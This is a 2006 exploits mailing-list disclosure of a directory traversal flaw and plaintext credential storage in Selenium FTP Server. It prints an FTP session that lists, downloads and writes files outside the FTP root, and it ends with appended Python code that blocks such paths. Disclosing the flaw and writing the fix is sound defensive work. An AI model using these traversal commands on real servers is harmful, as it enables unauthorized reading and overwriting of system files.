[exploits] BiBa Software Selenium FTP Vulnerabilities

Greg Linares glinares.code at gmail.com
Wed Nov 15 12:39:47 CST 2006


Selenium FTP Server ( http://bibasoftware.com/?page_id=15 ) is
vulnerable to a directory traversal input validation error in which
a remote unauthenticated user can use the DIR, LIST, NLST, etc.
commands to display any file on the remote server, use the
GET/RECV command to retrieve any file outside the FTP root, and use
PUT/SEND to write to any location on the remote server.

Here is a demonstration:

C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User  logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp        68096 May 02  2005 agrsmdel.exe
-rwxrwxrwx   1 ftp      ftp        44544 Jun 02  1998 clspack.exe
-rwxrwxrwx   1 ftp      ftp      1032192 Aug 04  2004 explorer.exe
-rwxrwxrwx   1 ftp      ftp        10752 May 26  2005 hh.exe
-rwxrwxrwx   1 ftp      ftp       306688 Oct 29  1998 IsUninst.exe
-rwxrwxrwx   1 ftp      ftp       112640 Jul 01  2001 lsb_un20.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad1.exe
-rwxrwxrwx   1 ftp      ftp       146432 Aug 04  2004 regedit.exe
-rwxrwxrwx   1 ftp      ftp        46352 Feb 28  2003 setdebug.exe
-rwxrwxrwx   1 ftp      ftp       286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx   1 ftp      ftp        32866 Aug 04  2004 slrundll.exe
-rwxrwxrwx   1 ftp      ftp        46592 Aug 02  2002 SOUNDMAN.EXE
-rwxrwxrwx   1 ftp      ftp        73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx   1 ftp      ftp        15360 Aug 04  2004 taskman.exe
-rwxrwxrwx   1 ftp      ftp        90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx   1 ftp      ftp        49680 Aug 04  2004 twunk_16.exe
-rwxrwxrwx   1 ftp      ftp        25600 Aug 04  2004 twunk_32.exe
-rwxrwxrwx   1 ftp      ftp       299520 Mar 23  1999 uninst.exe
-rwxrwxrwx   1 ftp      ftp       107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx   1 ftp      ftp        86016 Dec 17  1999 unvise32.exe
-rwxrwxrwx   1 ftp      ftp       256192 Aug 04  2004 winhelp.exe
-rwxrwxrwx   1 ftp      ftp       283648 Aug 04  2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.

Furthermore, the software improperly writes any username/password that
might be used to log in to the program in plaintext to the file[s]
stored in the default directory of
C:\Program Files\BiBa SOFTWARE\Selenium Server\Servers

Thank you for your time,
Greg Linares
GLinares.code at Gmail.com
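
One way a server can confine command arguments like those in the session above to its FTP root, as an added example (not code from the original post or from BiBa Software). The root C:\ftproot and the function names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, importable on any OS

class PathEscapesRoot(ValueError):
    """Client path resolves outside the FTP root."""

def resolve_ftp_path(root, cwd, client_path):
    """Map an FTP command argument to a real path confined to `root`.

    `cwd` is the session's virtual directory, e.g. "/" or "/pub"."""
    drive, rest = ntpath.splitdrive(client_path.replace("/", "\\"))
    # Drive letters, UNC prefixes, stream/device colons and NULs have no
    # meaning inside the virtual namespace, so refuse them outright.
    if drive or ":" in rest or "\x00" in rest:
        raise PathEscapesRoot(client_path)
    # A leading backslash means the virtual root, not the drive root.
    parts = [] if rest.startswith("\\") else [p for p in cwd.split("/") if p]
    for comp in rest.split("\\"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # would climb above the FTP root
                raise PathEscapesRoot(client_path)
            parts.pop()
        elif comp != comp.rstrip(". "):  # Win32 drops trailing dots/spaces
            raise PathEscapesRoot(client_path)
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: re-check the joined result against the root.
    root_n = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([root_n, ntpath.normcase(real)]) != root_n:
        raise PathEscapesRoot(client_path)
    return real

def is_allowed(root, cwd, client_path):
    """True when the argument stays inside the FTP root."""
    try:
        resolve_ftp_path(root, cwd, client_path)
        return True
    except PathEscapesRoot:
        return False

if __name__ == "__main__":
    # Constructed root; the arguments are the ones typed in the session.
    for arg in ("\\windows", "..\\windows\\win.ini", "..\\windows\\toobad.txt"):
        print(arg, is_allowed("C:\\ftproot", "/", arg))
```

The check is lexical only; a server should also resolve junctions and symbolic links before opening the file.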

